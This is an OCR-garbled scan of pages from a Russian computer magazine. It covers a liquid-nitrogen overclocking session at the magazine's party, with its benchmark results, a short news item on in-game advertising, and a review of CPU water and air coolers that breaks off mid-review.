в многопользовательских играх типа 5ітз 
Опііпе и Зесопсі Ше. Недавно компания 
Соо§1е зарегистрировала патент, в котором 
описывается способ предоставления рекламы 
пользователю подобных игр, основанный на 
сборе информации об игроке. Учитывается 
как поведение пользователя в виртуальном 
мире, так и музыка, которая прослушивается 
во время пребывания в виртуальном мире. Не- 
которые защитники конфиденциальности уже 
проявили озабоченность по поводу подобного 
способа сбора информации. Однако компания 
Соо§1е не заявляла о том, что этот патент будет 
использоваться на практике, и напомнила, что 
подобные патенты регистрируются независи- 
мо от того, предполагается их использование 
в дальнейшем или нет. Но тем не менее тен- 
денция завалить онлайн-миры кучей рекламы 



продолжает настораживать, 
а с другой стороны, возможно, скоро появятся 
бесплатные онлайн-игры, которые будут жить 
одной лишь рекламой. Только кому они будут 
нужны... 
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Мощный процессор Іпіеі 520 МНг 

ВІиеІооЕН СР5 приемник с картами Москвы и 
Московской области 

ѴѴіпс1о\л/5 МоЬіІе'" 1 5.0 позволяет работать со 
всеми офисными программами и прило- 
жениями (ѴѴогф ЕхсеІ, Іпіегпеі, РоѵѵегРоіпі) 
легко синхронизируется с настольным ПК 

Все виды мобильной связи: 

ТгіВапсІ С5М/СРК5/ЕРСЕ СІазз 10 

ВІиеІооіН 1 .2 
1Л/І-ЕІ 

МРЗ-плеер, ЕМ-радио, 2.0 Мрх фотокамера 
Компактный и легкий 












ІСАРКИС «ОЕОАЬ 


■ ГЕТЕМЯНІ 


/ ѴѴѴѴѴѴ.Т0РМ008.ЫЕТ /И 



Азотная вечеринка 

Сессия экстремального разгона на ЮОхРагіу 

Одной из главных фишек вечеринки ЮОхРагІу, состоявшейся 12 мая и 
посвященной сотому номеру «Хакера», стал экстремальный разгон ком- 
пьютерного железа под жидким азотом, организованный «высокочас- 
тотными» парнями из ТорМосІз.КЕТ. На этом событии мы и остановим- 
ся поподробнее, так как оно вызвало море вопросов и дало интересные 
результаты. 



Экстремальный разгон 

Под экстремальным разгоном подразумевается охлаждение процес- 
сора или видеопроцессора до температур много ниже нуля. Это нужно, 
чтобы выжать все соки из имеющейся платформы. Именно благодаря 
экстремальному охлаждению удается оченьсильно разогнать процессор. 
Это связано с эффектом сверхпроводимости. Если ты не учил физику в 
школе.то и не парься, а просто поверь нам на слово: при сверхнизких 
температурах процессор можно разогнать более чем в два раза. К счастью 
для производителей, использовать процессор в таком режиме долго 
нецелесообразно :). 

В качестве охладителей применяютсистемы на основе фазового пе- 
рехода, так называемые «фреонки» (от -20 до - 1 40 градусов Цельсия), 
сухой лед (-78 градусов) и короля заморозки — жидкий азот. Азот кипит 
при температуре -196 градусов Цельсия, булькая и испаряясь с харак- 



терным белым «дымом» и при этом сумасшедшими темпами отбирая 
те плоту у окружающего пространства. Для наглядности вспоминаем кино 
«Терминатор-2» с губернатором Калифорнии в главной роли. Но тут есть 
свои тонкости: не все процессоры работают при температуре ниже 
-120 градусов, есть и такие, которые отказываются запускаться уже 
на -1 0, соответственно, желателен отбор. То есть берется несколько 
процессоров и делаются тестовые прогоны. Если каменьупертый, ему 
объявляется досвидос :). 

Требуется также позаботиться от качественной теплоизоляции, чтоб не 
было конденсата и не промерзали электролитические конденсаторы 
вокругсокета процессора. В противном случае мы рискуем потерять 
материнскую плату, которая может захватить с собой на тот свет и еще 
чего-нибудь из комплектующих. При экстриме резко возраста юттребова- 
ния к питанию, качеству материнской платы и других комплектующих — в 
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> Азиз ЕЫ88006ТХ 



>СогзаігХМ52 8500С5 ББГС2 1066 МГц 



общем, экстрим может вылететь в копеечку, однако все мировые рекорды 
в популярныхтестах ставятся именно при экстремальном разгоне. 

Теория разгона 

При любом разгоне, не только экстремальном, нужно позаботиться о двух 
вещах: качественном питании и эффективном охлаждении. Разгоняя, 
например, процессор, ты заставляешь его работать быстрее, то есть 
транзисторы в нем переключаются с повышенной скоростью, а значит, 
им нужно больше энергии (при разгоне нам приходится увеличивать 
напряжение питания), и больше энергии выделяется в окружающее 
пространство в виде теплоты (растеттепловыделение процессора и 
цепей питания). Поэтому еслиты хочешь продлить срок службы своего 
агрегата, первое, о чем надо позаботиться при подобном безобразии, 

— это качественное охлаждение. Чем лучшеты охладишь процессор, тем 
лучше сможешь его разогнать. 

Какуже было сказано, растут и требования к питанию. Никогда не покупай 
блоки питания за 700-800 рублей мощностью 700-750 ватт! Они все равно 
не выдадут и половинытого, что на них написано. Качественный БП не 
может стоить дешевле 1600-2000 рублей, такие блоки имеют мощность 
порядка 400-460 честных ватт. Для компов стоимостью до 18000 рублей 
они вполне подойдут. Самый простой и проверенный способ получить 
представление о качестве БП — это взвесить его в руке — он должен быть 
тяжелым, а не болтаться, как перышко. 

Начало разгонного процесса осуществляется прямо из биоса. В материн- 
ских платах, хоть немного ориентированных на разгон, есть минимальный 
пакет возможностей по настойке основных параметров. ВІ05 — это первая 
программная оболочка, работающая непосредственно на уровне железа. 

Основные настройки 

Для людей, не совсем знакомых с разгоном, перечислю основные 
особенности и подводные камни настроек. Во-первых, все значения 
связанные с настройкой системной шины, памяти и т.п., надо перевести 
в режим Мапиаі (ручная настройка параметров). Известны случаи, когда 
люди выставляли огромные частоты шины и с удивлением чувствовали 
запах гари, исходящий из района системного блока своего компьютера. 
Такое происходило потому, что при значении Аиіо материнская плата 
сама выставляет напряжение на чипсете и процессоре, тайминги и 
напряжение памяти. Так что даже если тебе удалось выставить большую 
частоту системной шины, в итоге система будет работать не так, как долж- 
на. Материнские платы сами, какправило, выставляюттакие значения, 
что хочется плакать. Иногда бывает, что напряжения, выставленные 
материнкой, немножко не совпадаютс предельными значениями для 
конкретных комплектующих. Самое смешное, что в их число, бывает, по- 
падает и сама материнская плата, например, северный или южный мост. 
Но не всетак плохо, сейчас на современном железетакие вещи довольно 
редки. Был случай, когда на Азиз Соттапбо и процессоре Соге 2 Био 
6300 при полном Аиіо мы выставили частоту системной шины 520 МГц 
(значительно больше, чем положено) — и все прекрасно работало. Мед- 



леннее, конечно, чем при нормальных настройках железа, но работало! 
Нота кие вещи скорее исключение, чем правило: все-таки эта материн- 
ская плата создавалась под разгон. Неудивительно, что именно ее мы и 
выбрали для публичной сессии разгона. 

Еще один важный моментпри разгоне — это оперативная память. Что 
касается платформ на базе процессоров Соге 2 Био.тотутчем больше 
частота, на которой способна работать память, тем эффективнее разгон. 
Рассмотрим параметры памяти на примере чипсета Р965. Начнем стого, 
что процессоры Соге 2 Био с нормальным разгонным потенциалом имеют 
частоту системной шины 266 (1066) МГц. Этозначит, что для номинальных 
частот мы должны использовать как минимум память типа ББР2-533. Но 
при разгоне Соге 2 Био, особенно младших моделей, нужно повышать 
частоту системной шины до 400 МГц и больше, при этом, соответственно, 
нужна память ББР2-800 и выше. То есть чем выше мы возьмем номиналь- 
ную частоту памяти, тем большеу нас будетзапас при разгоне. 

В нашем случае выбор пал на память, которая может спокойно работать с 
частотой выше 1 100 МГц, с довольно низкими (агрессивными) тайминга- 
ми. Тайминги же, в общих чертах, представляют собой количество тактов 
между какими-либо операциями над памятью, то естьчисло единичек 
той самой частоты, которое пропустит память, прежде чем сможет запи- 
сать или прочитать данные из ячейки. Соответственно, если память тупит 
и пропускает кучу тактов перед каждой операцией, то толку от высокой 
ч а стоты будет н е м н о го . 

Подготовка к 1_№-пати 

Неудивляйся, І_Ы2 — это азот по-буржуйски (ІіциісІ пИтодеп). Именно он и 
стал главным героем разгонной сессии на пати журнала. 

Получив комплектующие, я погонял их предварительно на воздушном 
охлаждении, чтобы выяснить опытным путем уровеньтепловыделения 
процессора в нештатных режимах и определиться с количеством жидкого 
азота, необходимого для предварительного и финального теста. 

Азотбыл закуплен в одной из специализированныхфирм. Ихзаказ- 
чиками в большинстве случаев являются медицинскиеучреждения 
и салоны красоты, а с недавних пор еще и оверклокеры :). Учитывая 
масштаб предстоящего разгона, мы залили 25 литров азота в специаль- 
ную емкость, называемую сосудом Дьюара (это бакс двойными стенками, 
между которыми вакуум, там азотможетхраниться месяц, а из обычного 
термоса он испарится за пару дней). Перевозить та кую дуру по городу 
— дело не из легких, но в итоге нашлись добрые и меркантильные люди, 
которые помогли нам решить эту проблему, и по прибытию домой с азотом 
я незамедлительно взялся за тестирование. 

В ВІОБпоследовательноувеличивалосьзначение системной шины (Р5В). 
Также была использована фишка конкретно этого процессора, флагмана 
в линейке Іпіеі — его множитель. Сейчас объясню, что это такое. Тактовая 
частота процессора (внутренняя частота) в несколько раз выше систем- 
ной частоты и задается по коэффициентуумножения системной шины. 
Например, тактовая частота 0X6700 составляет 2, 66 ГГц. Системная шина 
работает на частоте 266 МГц. Соответственно, коэффициентумножения 
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> Так нам заправили 25 литров 



> Тестовый стенд на базе Авив Соттапсіо 



■ 



Процессор 
Материнска 
ОЗУ: 

Виді 



Іпіеі Соге 2 Ехігете 0X6700 (2,66 ГГц, 4 ядра) 
А5Ц5 Соттапсіо (чипсет Р965) 
Согсаіг ХМ52 8500С5 ООП2 1066 МГц (2 х 1024 Мб) 
А5Ы5 ЕМ8800СТХ 768 Мб/384 бит 
ѴѴезІегп Оідііаі Каріог 1500 10000 грт 
Тадап 900ѴѴ Т0900-Ц95 

Азиз РИузХ Р1 128 Мб РСІ 
штатная воздушная/ >.N2 
М5 ѴѴіпсІоѵѵз ХР 5Р2 ЕпдІізН 



НО 
БП: 

Физический 
Система охлаждени 



0X6700 равен 1 0 (266x1 0=2660]. Но этот процес- 
сор позволяетувеличивать свой множитель! В 
других процессорах этой линейки множитель 
заблокирован производителем. Мы выставили 
множитель 12, то есть 266x1 2=~3200 МГц. Дальше 
увеличивалась частота Р5В. Первым рубежом 
стабильности стало значение частоты системной 
шины 383 МГц. Это не экстремальная частота 
Р5В — процессоры с меньшим множителем, 
например младшие Соге 2 0ио, разгоняются как 
раз исключительно повышением частоты шины. 
Там значения Р5В бывают и больше 500. 

Дальше повышалось напряжение на процессо- 
ре. Рабочее напряжение 0X6700 составляет 
1 ,3 В. Оно было поднято до 1 ,62 V. В этом 
режиме уже как раз и нужно экстремальное 
охлаждение. Рабочеетепловыделение этого 
процессора составляет89 Вт. После изменения 
всех параметров его тепловыделение состави- 
ло порядка 230 Вт! Обычная система воздуш- 
ного охлаждения не способна отвести такое 
количество тепла. Ктомуже при экстремальном 
разгоне вопрос стоит не только об отводе тепла. 
Минусовые температуры требуются для ста- 
бильной работы при больших частотах. То есть 
если ты будешь использовать очень хороший 
кулер или даже систему водяного охлаждения, 
предел процессора по частоте, при которой он 
может стабильно работать, будет меньше. Тут 
требуются минусовые температуры. Медный 
стакан и жидкий азот для этого — в самый раз! 
Система охлаждения включала медный стакан 
весом полтора килограмма и теплоизоляцию, 
вы ступающую также в качестве защиты комп- 
лектующих от конденсата, образовывающегося 
при сверхнизкихтемпературах. Какты уже понял, 
нами использовался жидкий азот (температура 
кипения которого -195,8 градусов Цельсия). 
Испытания проводились на открытом стенде. 

Разгонное железо 

Процессор ІпІеІСоге 2 Ехігете 0X6700 на 
сегодняшний день является самым быстрым 
в индустрии, а приставка Ехігете означает 
возможность какувеличивать.так и уменьшать 
множитель. Напомню, что на не Ехігете-верси- 
ях множитель можно только снижать. 
Материнская плата Азиз Соттапсіо была 
выбрана неслучайно. Дело втом, что она 
идеально подходит под экстрим, так каку нее 



есть все необходимые функции для получения 
максимального результата: большой диапазон 
изменения напряжения на процессоре, памяти, 
мостах, также вокруг сокета у нее отсутствуют 
электролитические конденсаторы, которые 
могут промерзнуть (заменены твердотельными). 
Память СогзаігХМ52 8500С5 00Н2 1 066 МГц 
является одной из самых популярных среди 
оверклокеров, так как позволяет работать как с 
высокими, так и с низкими частотой и задерж- 
ками (таймингами). 

Азиз ЕІЧ88006ТХ 768 Мб/384 бит на основе 
видеочипа 680 является непобедимой и по 
сей день. 1 28 унифицированных потоковых 
процессоров и широкая шина памяти в 
384 бита несомненно играют определяющую 
роль в обеспечении высокой производитель- 
ности. ѴѴезІегп Оідііаі Раріог 1 506 1 0000 грт 
сегодня является самой быстрой дисковой под- 
системой стандарта 5АТА. Никакой другой 5АТА- 
диск не дасттебе такой производительности, как 
этот, благодаря скорости вращения шпинделя 
10000 оборотов/мин. (против 7200 у стандарт- 
ных). При этом уровень шума очень низок. 

Тадап 900ѴѴТ6900-ІІ95 был выбран как показав- 
ший себя схорошей стороны, качественный и 
мощный девайс. Так как сейчас самая востре- 
бованная линия питания — это 12Ѵ, разработ- 
чики Тадап уделили ей особое внимание — этот 
БП может выдавать по указанной линии до 80(!) 
ампертока, чего с запасом хватитлюбой систе- 
ме, даже предельно разогнанной. Физический 
ускоритель Азиз РИузХ Р1 128 Мб РСІ был взят 
для демонстрации возможности расчета физи- 



ки игрового мира. Сн выводит игры, которые его 
поддерживают, на качественно другой уровень 
восприятия игрового процесса. 

На нашем мероприятии была показана 
демоверсия игры СШРасЫ, поразившая 
собравшихся натуралистичностью взрывов и 
разрушений обстановки. 

Неплохая игровая система, не правда ли? Но 
нам хотелось большего! 

Экстрим-сессия на «Хакер»-пати 

Атеперь о главном. По прибытии на место 
проведения этого замечательного события, 
мной и моим помощником было организова- 
но предварительноетестирование. В ходе 
тестирования мне пришлось следить нетолько 
за стабильностью системы и температурой, но 
и за группами любознательныхтоварищей в 
возрасте отЗ до 30 лет :). 

Скорость системы проверялась в популярных 
тестах: 

1 . Риіигетагк Зй Магк 05 — его результат в боль- 
шей степени зависит отскорости видеокарты. 

2. Адиатагк 3 — тест, оценивающий быстроту 
нетолько видеокарты, но и процессора с 
памятью. 

З.бирегРі 1,5 тосІХб — тест вычисляет 
число «пи» сточностью — от 64 тысяч до 32 
миллионов знаков после запятой. Результат 
напрямую зависит отпроцессора и памяти. Мы 
во всех случаях считали сточностью до одного 
миллиона знаков после запятой. 

Чтобы можно было наглядно продемонстриро- 
вать эффект от разгона процессора, изна- 
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разгонного стенда > Большой сосуд Дьюара сжидким азотом 



чально все тесты проводились на системе, работающей в 
номинальном режиме, то есть без разгона. Все настройки 
ВІ05 и операционной системы были, что называется, по 
умолчанию, как есть. Мы получили следующие результаты: 

30 МагкОб — 15860 баллов; 

АциатагкЗ— 145245 баллов; 

ЭирегРі 1,5— 18,841 секунды. 

Затем, пока собравшиеся показывали свои знания в области 
хардвара и зарабатывали призы, а девушки хакеров моро- 
зили в азоте розочки и разбивали их об сцену с характерным 
стеклянным звоном, мы готовили экстремальный стенд: 
устанавливали азотный стакан так, чтобы его основание 
плотно прилегало к поверхности процессора, переливали 
азот из сосуда Дьюара в более удобные емкости. 

А потом был экстрим! Еще раз скажу, что сложность охлажде- 
ния азотом заключается в том, чтобы не довести процессор 
до такой температуры, при которой он не сможет работать. 

У нашего экземпляра проблемы с запуском системы были 
при -105 градусах Цельсия, соответственно, я поддерживал 
ее на уровне -102 градуса. Мониторингосуществлялся с 
помощью специального термометра. 

В итоге процессор удалось разогнать с 2,66 ГГц до 4,6 ГГц. 
Для 4-ядерного СРІ) это довольно высокий результат, с 
учетом прохождения им всехтестов без запинок и вылетов. 
Ведь в 4-ядерном проце — целых 4 ядра, каждое со своим 
характером, который в любой момент может воспрепятство- 
вать дальнейшему разгону и помешать остальным ядрам 
раскрыть свой потенциал. 

На видеокарте охлаждение не менялось. Разгон осущест- 
влялся программным методом с помощью утилиты Ріѵа Типег 
2.01 . Предварительно на этой видеокарточке был сделан 
вольтмод (вторжение в схему питания в виде подпайки допол- 
нительных элементов с цельюувеличения напряжений или 
их стабилизации — примечание редактора), позволяющий 
увеличивать напряжение на видеопроцессоре. Модифика- 
ция питания памяти не производилась, так как прибавка в 
20-30 МГц была не так актуальна. В итоге частоты видеокарты 
удалосьувеличить с 575/1800 (ядро/память) до 675/2400. Для 
воздуха это великолепный результат, особенно по памяти! 
Оперативная память при этом работала на частоте 1 1 50 
МГцстаймингами (4-4-3-7) — класс! Ну и результаты были 
соответствующие: 

30 МагкОб — 23256 баллов; 

АциатагкЗ — 2451 78 баллов; 

5ирег Рі 1 ,5 — 1 0,841 секунд. 

Как говорится, почувствуй разницу! 



Жестокий Селерон 

Ну и напоследокя приготовил сюрприз — звездный бой 
насмерть: процессор за $1 000 ѵб процессор за 1000 рублей ;). 
В ролях: 

• процессор за $1000 — Іпіеі Соге 2 Ехігете 0X6700 2,66 ГГц 
8 Мб КЭШ; 

• процессор за 1 000 рублей — Іпіеі Сеіегоп О 347 3,06 ГГц 51 2 
Кб кэш. 

Производительность я решил проверить в тесте Эирег Рі. 

В номинале Сеіегоп й 347 считаетчисло «пи» до миллионно- 
го знака за 46,325 секунды. После того как мы его охладили 
до -138 градусов Цельсия, его удалось разогнать до 7520 
МГц! В итоге число «пи» мы просчитали за 18,895 секун- 
ды, ровно за такое время его считает 0X6700 в номинале! 
Напомню, что этоттест использует один поток вычисления, 
то есть толку от других трех ядер в нем нет. Таким образом, 
сражались честно: одно ядро против одного ядра. Итак, мы 
на практике показали, на какой частоте должен вкалывать 
Сеіегоп 0 347, чтобы догнать одно ядро Соге 2, работающее 
на частоте 2,66 ГГц. 

На разгоне последнего процессора хотелось бы немного 
заострить твое внимание. Во-первых, это замечательный 
представитель поколения Реп1іит4на микроархитекту- 
ре ЫеіВигБІ, которая царила на рынке ни много ни мало 
порядка семи лет, что является очень большим сроком в 
масштабах ІТ-индустрии. Начало этого поколения положило 
семейство процессоров на основе ядра ѴѴіІІатеІІе, потом 
было, пожалуй, самое удачное ядро ІЧоНИѵѵоосІ, а затем пе- 
чально известный Ргезсоіі. После этого уже пошли первые 
двухъядерныетворения на ядрах ЭтііЫіеІсІ (два Ргезсоіі в 
одной упаковке), затем Ргезіеги его одноядерный вариант 
СебагМіІІ. На СебагМіІІ как раз и основан наш Сеіегоп 347 
3060 МГц 51 2 Кб І_2. 

С чем связан такой удачный результат (140% от номинала)? 
Прежде всего, как ни смешно, с его одноядерностью — тех- 
процесс производства этих процессоров (65 нм), можно ска- 
зать, находится на вершине совершенства и отлаженности. 
Он не имел проблем со стабильностью даже при температуре 
ниже -130 градусов Цельсия, как это было с Соге 2 Ехігете 
0X6700. 

Ну и в заключение хотелось бы поделиться с тобой радостью. 
Этот многострадальный Сеіегоп со своей максимальной (ск- 
рин шотной) частотой 7612 МГц, является пятым в мировом 
рейтинге величин частот, достигаемых кем-либо! Список на 
момент писания статьи выглядел таким образом: 

1.81 79,89 МГц - ТЬиб ОС Теат Ііаіу 
2. 7984,49 МГц -хЬгіап88 
3.7770,13 МГц — 99іотсаІ 
4. 7758,72 МГц — азрзіеіп 

5. 7613 МГц — ОеОаІ_ (это я, твой покорный слуга) НС 




> ѵѵѵѵѵѵ.ІортосІ5. 
пеі — наши друзья, 
которые занимались 
разгоном на 
вечеринке. 



В 

>На нашем ОѴО 
лежит видео- и фо- 
тоотчет с вечеринки, 
где запечатлен 
экстримальный 
разгон с азотным 
охлаждением. 
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Тестирование водяных и воздушных систем охлаждения для СРІІ 

Так получилось, что современные процессоры не только занимаются вычислениями, но 
еще и выделяют тепло. Проблема в том, что в виде тепла выделяется энергия, расходуемая 
при переключении логических элементов или при передаче информации по линиям связи. 
И чем мощнее процессор, чем больше в нем транзисторов и чем больше он совершает опе- 
раций в секунду, тем сильнее он греется. 

Воздушные системы охлаждения снова очень актуальны при появлении новых малогрею- 
щихся процессоров (в которых существенно сократились размеры транзисторов и длины 
линий связи, появились усовершенствованные технологии энергосбережения). Но и водян- 
ки умирать не спешат. Пора разобраться, что и как в мире охладителей и чем одна категория 
отличается от другой. 



Технологии 

Какты понимаешь, в водяных системах охлаждения хладагентом рабо- 
тает вода. Лучше всего использовать дистиллированную. Поэтому же- 
лательно, чтобы внутренности водянки были анодированы. Но в любом 
случае имеетсмысл добавить специальную присадку. Иногда она идет в 
комплекте, но если ее нет, можно попробовать купить ее отдельно. 
Основание ватерблока должно быть хорошо отполировано, пос- 
кольку от этого зависит контакт с чипом. Кстати, это относится и к 
воздушным кулерам. 

В нашем тесте участвуют воздушные системы охлаждения с теп- 
ловыми трубами. В трубу запаяны жидкость и пористый материал. 
Под действием капиллярных сил жидкость распространяется по 
порам. На горячем конце тепловой трубы жидкость испаряется, а на 
холодном конце конденсируется, возвращаясь назад по капилля- 
рам уже в виде жидкости. Таким образом, тепловая труба позволяет 
довольно эффективно передавать тепло от процессора к массивно- 
му радиатору. 

Кроме хорошего контакта с чипом, важен еще и материал, из которого 
изготовлен радиатор. Медь обладает в полтора раза большей теплопро- 
водностью, чем алюминий, однако она значительно дороже. Поэтому 
алюминиевые решения еще присутствуют на прилавках компьютерных 



магазинов. Хотя при недостатке денег и/или не слишком мощном потеп- 
ловыделению процессоре они вполне имеютправо на существование. 

Методика тестирования 

Какты знаешь, современные процессоры Сопгое нетаксильно страдают 
тепловыделением, как их предшественники РгезсоІЕ Поэтому мы взяли 
на тест самого мощного и самого горячего представителя этого семейс- 
тва (Ргезсой) Іп^еі Репбигп 4 Ехігете Есііііоп 3,73, выделяющего на своем 
небольшом кристалле аж 1 25 ватттепла. Хотя новый Іпіеі Соге 2 (ЗиасІ в 
жестких режимах, возможно, его и переплюнет. 

Если наши подопытные справятся с экстремальным процом.то менее горя- 
чие они потянугбез проблем. Для улучшения термоконтакта была использо- 
вана термопаста КПТ8, надежно зарекомендовавшая себя какнедорогая, но 
при этом одна из самых эффективных. Для того чтобы какследует прогреть 
наш монстропроц, мы использовали последнюю версию программы 5&М за 
номером 1 .9.0(6). В ее настройках были отключены тесты памяти и жесткого 
диска, а загрузка процессора была выставлена на 1 00%. Во время тестирова- 
ния программа МоОіегЬоагсІ Мопйюгб.3. 7.0 фиксировала все температурные 
колебания и записывала их в лог, из которого впоследствии были построены 
графики. У некоторых систем были регуляторы скорости вращения кулеров, а 
так каку нас процессор горячий, то мы их выставили на максимум. 



ТЕСТОВЫЙ СТЕНД: 

Процессор, ГГц: 3,73, ІпІеІРепбитД Ехіхете Есіібоп; Материнская плата:Ави5 Р5В Оеіихе; Память,М6:2х512, Сог5аігООР2Тѵѵіп2Х; 
Видеоплата, Мб: 1 28, НІ5 Рабеоп XI 600 РРО ІсеСіЗ; Жесткий ДИСК, Гб: 500, 5еада*е 5Т3500641 N5; Блок питания, Вт: 700, ТЬегглабаке 
ТоидЬроѵѵег 

/ 020 



ХАКЕР 06 /102/ 07 






>> 



Те гг и гм 




Рготосіг СооІесІ Бііепсе 
Бтаіі Раскаде 

•••••••••О 

Технические характеристики: 

Производительность помпы, литр/час: 700 
Материал: радиатор — медь, ватерблок — медь 

Габариты: н/д 

Скорость вращения кулера, об/мин: 2000 
Шумность, дБ: 20 

Совместимость: БоскеТ А, 754 , 939 , 940 , 

478,603,604. 1-6А775 

Плюсы. Водянка показывает отличные результаты! Лучше, чем СооІесІ 
Бііепсе, охлаждают, наверное, только фреонки. В нашем тесте участ- 
вует самая «простая» модификация, включающая в себя только бачек, 
ватерблок для процессора, шланги «маленький» радиатор, всего под 
один 120-миллиметровый кулер. Бачек пригоден для установки в 5,25 м 
отсек и полностью прозрачен. Штуцеры у СооІесІ Бііепсе замечательные и 
непохожие ни на какие другие. Хотя крепление ватерблока на процес- 
соре не слишком удобно при установке, но оно обеспечиваетхороший 
прижим и безопасность платы. А рамка-подкладка под низ платы не 
дастей прогибаться. Основание ватерблока ошлифовано хоть и не до 
зеркального блеска, но без заметных царапин и прочих дефектов. Отсюда 
хороший термоконтакт. Шум помпы можно услышать, только поднеся 
кнейухо. Ватерблоки радиатор изготовлены из анодированной меди. 

С одной стороны, это улучшает ихтеплообменные свойства, а сдругой 
— они менее подвержены окислению как от воды, так и на воздухе. Ну и, 
наконец, СооІесІ Бііепсе идеально подходит для моддерского компьюте- 
ра. Оранжевая цветовая гамма во всех деталях и прозрачные элементы 
делают эту водянку просто неотразимой. 

Минусы. Система сложна в сборке. После сборки стоит произвести проверку 
не на самой плате, а где-нибудь еще, поскольку если шланг неплотно вставлен 
в штуцер, то потечет вода. Человек, незнакомый с системой, не всегда сможет 
вставить шланг правильно с первого раза. Из бачка не удается полностью 
удалить воздух. Отсутствует выключатель на шнуре питания и инструкция. 



Технические характеристики: 

Производительность помпы, литр/час: 1 50 
Материал: радиатор — алюминий, ватерблок — медь 
Габариты, мм: 76x436x369 
Скорость вращения кулера, об/мин: О 
Шумность, дБ: н/д 

Совместимость: Боскеі 754, 939, 940, 478, 1 _СА 775 

Плюсы. 2а1тап Пезегаіог 2 — удобство во плоти. С ним все просто и 
интуитивно понятно. Даже новичок сможет разобраться, что, как и куда 
подключать. Удобство проявляется везде и во всем. Установка ватерблока 
на процессор не требует много усилий, ни физических, ниумственных. Но 
если потребуется, можно заглянуть в инструкцию, которая прилагается. 
Кроме того, в комплекте есть ватерблок для видеокарты. Сам ватерблок 
анодирован золотом. Прилагается и антикоррозийная жидкость. Длина 
шланга, идущего в комплекте, вполне достаточна, если сам резервуар-ра- 
диатор стоит рядом с корпусом. Такому способу постановки способствует 
ито, что помпу можно подключать к четырехконтактному молекс-разъему, 
а значит, стартовать водянку вместе с компьютером. Внешний вид тоже 
не подводит. Сам девайс выполнен в серебристо-черныхтонах, а синее 
окошечко его здорово освежает. Нестыдно поставить рядом с красивым 
корпусом. Комплектация включает в себя почти все, что требуется для 
сбора водянки. И даже больше. 

Минусы. Без инструмента вроде плоскогубцев трудно надевать металли- 
ческие защелки. Помпа не очень мощная, да и отсутствие продува — факт 
не в пользу девайса. Все сделано по первому классу, но цена от этого 
весьма высока. 

СПИСОК ТЕСТИРУЕМОГО ОБОРУДОВАНИЯ: 
І.РготосІгСооІесІБіІепсеБтаи Раскаде 
2.5ріге Роигіег IV 

3. Бріге ѴегііСооІІѴ 

4. Типія Тоѵѵег120 

5. 2аІтап СЫР59700 ЫТ 
6. 2а1тап Кегегаіог 2 
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Теп-ит 




$ріге ѴегІіСооІ IV 

•••••••000 



Технические характеристики: 

Скорость вращения кулера, об/мин: 2000-3500 +/-10% 
Уровень шума, дБ: 19-26 

Совместимость: Боскеі 754, 939, 940, 478, 1 _ 6 А 775 

Габариты, мм: 71x98x123 
Материал: медь 




Кулер пришел на смену удачной модели Зріге ѴегіСооІ III и в целом 
превзошел своего собрата. Первое, что бросается в глаза, — это другая 
конструкция радиатора. Хотя она несколько и упрощена, по сравнению с 
предыдущей моделью, нам кажется, что так охлаждение будет эффектив- 
нее. Теплотрубок использовано четыре, что опять-таки вполне достаточно. 
Радиатор сделан целиком из меди, а не из алюминия, как в случае с мо- 
делью ѴегІіСооІ III, и это тоже хорошо, ведь медь намного лучше проводит 
тепло. В комплекте, помимо самого кулера, крепления и инструкции, есть 
еще и регулятор оборотов. Полезная вещь, особенно если надо охлаждать 
не очень мощные процессоры. Закрепить на плате эту махину довольно 
просто. Крепится вся конструкция на винтиках к рамке, которую нужно под- 
ложить с обратной стороны платы. Ничего не болтается и конта ктхороший. 



При неплохом потенциале результаты явно не самые выдающиеся. Нето 
чтобы плохие, но мы ожидали большего. Из-за тонких и частых ребер будут 
проблемы счисткой. Да и цена на кулеры с теплотрубками кусается. 




> При почти одинаковых характеристиках ѴегІіСооІ IV смог чуть- 
чуть обогнать собрата по оружию Роигіег IV. Впрочем, разница в 
пределах погрешности 
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5ріге Роигіег IV 

•••••••ООО 

Технические характеристики: 

Скорость вращения кулера, об/мин: 2000-3500 +/-10% 
Уровень шума, дБ: 19-26 

Совместимость: Зоскеі 754, 939, 940, 478, І_6А 775 

Габариты, мм: 126x107x99 
Материал: медь 



Кулер практически идентичен по креплению 5ріге ѴеГгіСооІ IV. Это значит, 
что крепление здесьтакоеже хорошее и удобное, и главное — оно выдер- 
жит эту нелегкую медную махину. И ктомуже пропеллер дует не в бок, а 
вверх. Такая конструкция интересна в первую очередьтем, что теплообмен 
в корпусе совершается по-другому. И если поставить рядом пропеллер на 
вытяжку, то ему легче будет расправляться с горячим воздушным потоком 
от процессора. Теплотрубок здесь четыре, и все распределены по радиато- 
рутак, чтобы передавать как можно больше тепла. Ребра оченьтонкие, и 
их достаточно много. На месте и регулятор скорости вращения пропелле- 
ра. Для любителей тишины и владельцев слабых процессоров вещица в 
самый раз. 




Из-за того что кулер дует вверх, транзисторы М05РЕТ лишились пос- 
леднего, пусть и довольнотеплого, обдува. Если о них не позаботиться, 
последствия могут быть неприятны. После полугода эксплуатации масса 
кулера увеличится из-за скопления пыли междутонкими ребрами, а 
эффективность упадет. 



Зріге Роигіег IV 




> Очень неплохой результат. Не рекорд, но и не провал 
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2а I та іі СГОР59700 ПІТ 

••••••••00 

Технические характеристики: 

Скорость вращения кулера, об/мин: 

1250 - 2800 +/- 20 % 

Уровень шума, дБ: 19 . 5-35 
Совместимость: Боскеі 754, 939, 478, 1 _ 6 А 775 

Габариты, мм : 90x124x142 
Материал: медь 




Кулер целиком выполнен из анодированной меди и имеетбтеплотру- 
бок (то естьЗ, но двусторонние). Огромное количество ребер позволит 
рассеять столько тепла, сколько понадобится. Ктомуже в комплекте идет 
какая-то невероятно крутая термопаста в пузырьке, которую в 2аІтап 
активно расхваливают. Закрепить кулер на процессоре проще простого. 
Разобраться стем, как уста на вливать 2а1тап СЫР59700 ІЧТ, легко уже 
после первого прочтения инструкции. 




Цена устройства переходит почти все допустимые для воздушных кулеров 
границы. Отдать почти сотню вечнозеленых президентов за охладитель 
для ЦП — это как-то чересчур. Эффективность устройства тоже не на высо- 
те. Неизвестно, что послужилотому причиной: плохой контакте чипом или 
что-то другое, но факт остается фактом. Девайс проиграл менее дорогому 
и в придачу наполовину ал юминиевому Типщ Тоѵѵег 120. Вес охладите- 
ля приближается к килограмму, и материнскую плату с установленным 
2аІтап СЫР59700 ЫТ лучше не кантовать и не переносить во избежание 
ее повреждения. 

2аІтапС№59700 N1 




> Результат хороший, но при такой цене мог быть и лучше 




Ткшк| Томіег 120 

••••••••00 



Технические характеристики: 

Скорость вращения кулера, об/мин: 1000-2000 +/-10% 
